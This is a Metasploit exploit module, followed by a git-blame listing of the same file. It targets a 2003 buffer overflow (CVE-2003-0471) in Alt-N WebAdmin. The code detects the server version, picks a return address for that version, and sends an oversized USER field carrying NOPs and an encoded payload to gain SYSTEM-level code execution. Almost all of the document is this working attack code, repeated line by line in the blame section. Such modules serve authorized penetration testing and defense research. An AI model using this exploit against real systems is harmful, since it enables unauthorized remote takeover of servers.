modules/exploits/windows/http/altn_webadmin.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Alt-N WebAdmin USER Buffer Overflow',
      'Description'    => %q{
        Alt-N WebAdmin is prone to a buffer overflow condition. This
        is due to insufficient bounds checking on the USER
        parameter. Successful exploitation could result in code
        execution with SYSTEM level privileges.
      },
      'Author'         => [ 'MC' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2003-0471' ],
          [ 'OSVDB', '2207' ],
          [ 'BID', '8024'],
          [ 'URL', 'http://www.nessus.org/plugins/index.php?view=single&id=11771']
        ],
      'Privileged'     => true,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload'        =>
        {
          'Space'    => 830,
          'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
          'StackAdjustment' => -3500,

        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          ['Automatic', {}],
          ['WebAdmin 2.0.4 Universal', { 'Ret' => 0x10074d9b }], # 2.0.4 webAdmin.dll
          ['WebAdmin 2.0.3 Universal', { 'Ret' => 0x10074b13 }], # 2.0.3 webAdmin.dll
          ['WebAdmin 2.0.2 Universal', { 'Ret' => 0x10071e3b }], # 2.0.2 webAdmin.dll
          ['WebAdmin 2.0.1 Universal', { 'Ret' => 0x100543c2 }], # 2.0.1 webAdmin.dll
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => '2003-06-24'))

      register_options([Opt::RPORT(1000)])
  end

  def exploit

    mytarget = target

    if (target.name =~ /Automatic/)
      res = send_request_raw({
        'uri'   => '/WebAdmin.DLL'
      }, -1)

      if (res and res.body =~ /WebAdmin.*v(2\..*)$/)
        case $1
        when /2\.0\.4/
          mytarget = targets[1]
        when /2\.0\.3/
          mytarget = targets[2]
        when /2\.0\.2/
          mytarget = targets[3]
        when /2\.0\.1/
          mytarget = targets[4]
        else
          print_error("No target found for v#{$1}")
          return
        end
      else
        print_error("No target found")
      end
    end

    user_cook = rand_text_alphanumeric(2)
    post_data = 'User=' + make_nops(168) + [mytarget.ret].pack('V') + payload.encoded
    post_data << '&Password=wtf&languageselect=en&Theme=Heavy&Logon=Sign+In'

    print_status("Sending request...")
    res = send_request_cgi({
      'uri'          => '/WebAdmin.DLL',
      'query'        => 'View=Logon',
      'method'       => 'POST',
      'content-type' => 'application/x-www-form-urlencoded',
      'cookie'       => "User=#{user_cook}; Lang=en; Theme=standard",
      'data'         => post_data,
      'headers'      =>
      {
        'Accept'          => 'image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png',
        'Accept-Language' => 'en',
        'Accept-Charset'  => 'iso-8859-1,*,utf-8'
      }
    }, 5)

    handler
  end
end
Adding an Id tag and a standard header to all modules 2007-02-18 00:10:39 +00:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Adding an Id tag and a standard header to all modules 2007-02-18 00:10:39 +00:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
add ranking to every exploit module, pfew! 2009-12-06 05:50:37 +00:00			`Rank = AverageRanking`
Retab modules 2013-08-30 16:28:54 -05:00
This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. 2008-10-02 05:23:59 +00:00			`include Msf::Exploit::Remote::HttpClient`
Retab modules 2013-08-30 16:28:54 -05:00
New modules, module renames 2005-12-26 14:34:22 +00:00			`def initialize(info = {})`
Various module cleanups 2010-02-15 00:48:03 +00:00			`super(update_info(info,`
New modules, module renames 2005-12-26 14:34:22 +00:00			`'Name' => 'Alt-N WebAdmin USER Buffer Overflow',`
			`'Description' => %q{`
			`Alt-N WebAdmin is prone to a buffer overflow condition. This`
			`is due to insufficient bounds checking on the USER`
			`parameter. Successful exploitation could result in code`
			`execution with SYSTEM level privileges.`
			`},`
			`'Author' => [ 'MC' ],`
MC asked us to place his code under MSF license 2006-06-21 18:38:40 +00:00			`'License' => MSF_LICENSE,`
New modules, module renames 2005-12-26 14:34:22 +00:00			`'References' =>`
			`[`
More osvdb references from Steve Tornio 2009-05-12 19:56:54 +00:00			`[ 'CVE', '2003-0471' ],`
Revert "Land #6812 , remove broken OSVDB references" 2016-07-15 12:00:31 -05:00			`[ 'OSVDB', '2207' ],`
New modules, module renames 2005-12-26 14:34:22 +00:00			`[ 'BID', '8024'],`
Fixes #5414 by applying Joshua Taylor's patch that corrects bad reference types 2011-10-16 09:53:53 +00:00			`[ 'URL', 'http://www.nessus.org/plugins/index.php?view=single&id=11771']`
New modules, module renames 2005-12-26 14:34:22 +00:00			`],`
corrected "privileged" flag 2009-12-21 18:18:18 +00:00			`'Privileged' => true,`
New modules, module renames 2005-12-26 14:34:22 +00:00			`'DefaultOptions' =>`
			`{`
			`'EXITFUNC' => 'thread',`
			`},`
			`'Payload' =>`
			`{`
			`'Space' => 830,`
			`'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",`
			`'StackAdjustment' => -3500,`
Retab modules 2013-08-30 16:28:54 -05:00
New modules, module renames 2005-12-26 14:34:22 +00:00			`},`
			`'Platform' => 'win',`
Various module cleanups 2010-02-15 00:48:03 +00:00			`'Targets' =>`
New modules, module renames 2005-12-26 14:34:22 +00:00			`[`
Various module cleanups 2010-02-15 00:48:03 +00:00			`['Automatic', {}],`
New modules, module renames 2005-12-26 14:34:22 +00:00			`['WebAdmin 2.0.4 Universal', { 'Ret' => 0x10074d9b }], # 2.0.4 webAdmin.dll`
			`['WebAdmin 2.0.3 Universal', { 'Ret' => 0x10074b13 }], # 2.0.3 webAdmin.dll`
			`['WebAdmin 2.0.2 Universal', { 'Ret' => 0x10071e3b }], # 2.0.2 webAdmin.dll`
Various module cleanups 2010-02-15 00:48:03 +00:00			`['WebAdmin 2.0.1 Universal', { 'Ret' => 0x100543c2 }], # 2.0.1 webAdmin.dll`
New modules, module renames 2005-12-26 14:34:22 +00:00			`],`
Various module cleanups 2010-02-15 00:48:03 +00:00			`'DefaultTarget' => 0,`
Convert disclosure dates to iso8601 2020-10-02 17:38:06 +01:00			`'DisclosureDate' => '2003-06-24'))`
Retab modules 2013-08-30 16:28:54 -05:00
Fix msf/core and self.class msftidy warnings 2017-05-03 15:42:21 -05:00			`register_options([Opt::RPORT(1000)])`
New modules, module renames 2005-12-26 14:34:22 +00:00			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Various module cleanups 2010-02-15 00:48:03 +00:00			`def exploit`
Retab modules 2013-08-30 16:28:54 -05:00
Various module cleanups 2010-02-15 00:48:03 +00:00			`mytarget = target`
Retab modules 2013-08-30 16:28:54 -05:00
Various module cleanups 2010-02-15 00:48:03 +00:00			`if (target.name =~ /Automatic/)`
			`res = send_request_raw({`
			`'uri' => '/WebAdmin.DLL'`
			`}, -1)`
Retab modules 2013-08-30 16:28:54 -05:00
Various module cleanups 2010-02-15 00:48:03 +00:00			`if (res and res.body =~ /WebAdmin.v(2\..)$/)`
			`case $1`
			`when /2\.0\.4/`
			`mytarget = targets[1]`
			`when /2\.0\.3/`
			`mytarget = targets[2]`
			`when /2\.0\.2/`
			`mytarget = targets[3]`
			`when /2\.0\.1/`
			`mytarget = targets[4]`
			`else`
			`print_error("No target found for v#{$1}")`
			`return`
			`end`
autoexploit magic 2006-09-18 00:54:29 +00:00			`else`
Various module cleanups 2010-02-15 00:48:03 +00:00			`print_error("No target found")`
autoexploit magic 2006-09-18 00:54:29 +00:00			`end`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
updated modules to use base class rand_xxx methods 2007-03-01 08:21:36 +00:00			`user_cook = rand_text_alphanumeric(2)`
Various module cleanups 2010-02-15 00:48:03 +00:00			`post_data = 'User=' + make_nops(168) + [mytarget.ret].pack('V') + payload.encoded`
New modules, module renames 2005-12-26 14:34:22 +00:00			`post_data << '&Password=wtf&languageselect=en&Theme=Heavy&Logon=Sign+In'`
Retab modules 2013-08-30 16:28:54 -05:00
Integration of the new HTTP Client API 2006-12-28 23:42:36 +00:00			`print_status("Sending request...")`
			`res = send_request_cgi({`
			`'uri' => '/WebAdmin.DLL',`
			`'query' => 'View=Logon',`
New modules, module renames 2005-12-26 14:34:22 +00:00			`'method' => 'POST',`
			`'content-type' => 'application/x-www-form-urlencoded',`
autoexploit magic 2006-09-18 00:54:29 +00:00			`'cookie' => "User=#{user_cook}; Lang=en; Theme=standard",`
New modules, module renames 2005-12-26 14:34:22 +00:00			`'data' => post_data,`
Various module cleanups 2010-02-15 00:48:03 +00:00			`'headers' =>`
Integration of the new HTTP Client API 2006-12-28 23:42:36 +00:00			`{`
			`'Accept' => 'image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png',`
			`'Accept-Language' => 'en',`
			`'Accept-Charset' => 'iso-8859-1,*,utf-8'`
			`}`
			`}, 5)`
Retab modules 2013-08-30 16:28:54 -05:00
New modules, module renames 2005-12-26 14:34:22 +00:00			`handler`
			`end`
More osvdb references from Steve Tornio 2009-05-12 19:56:54 +00:00			`end`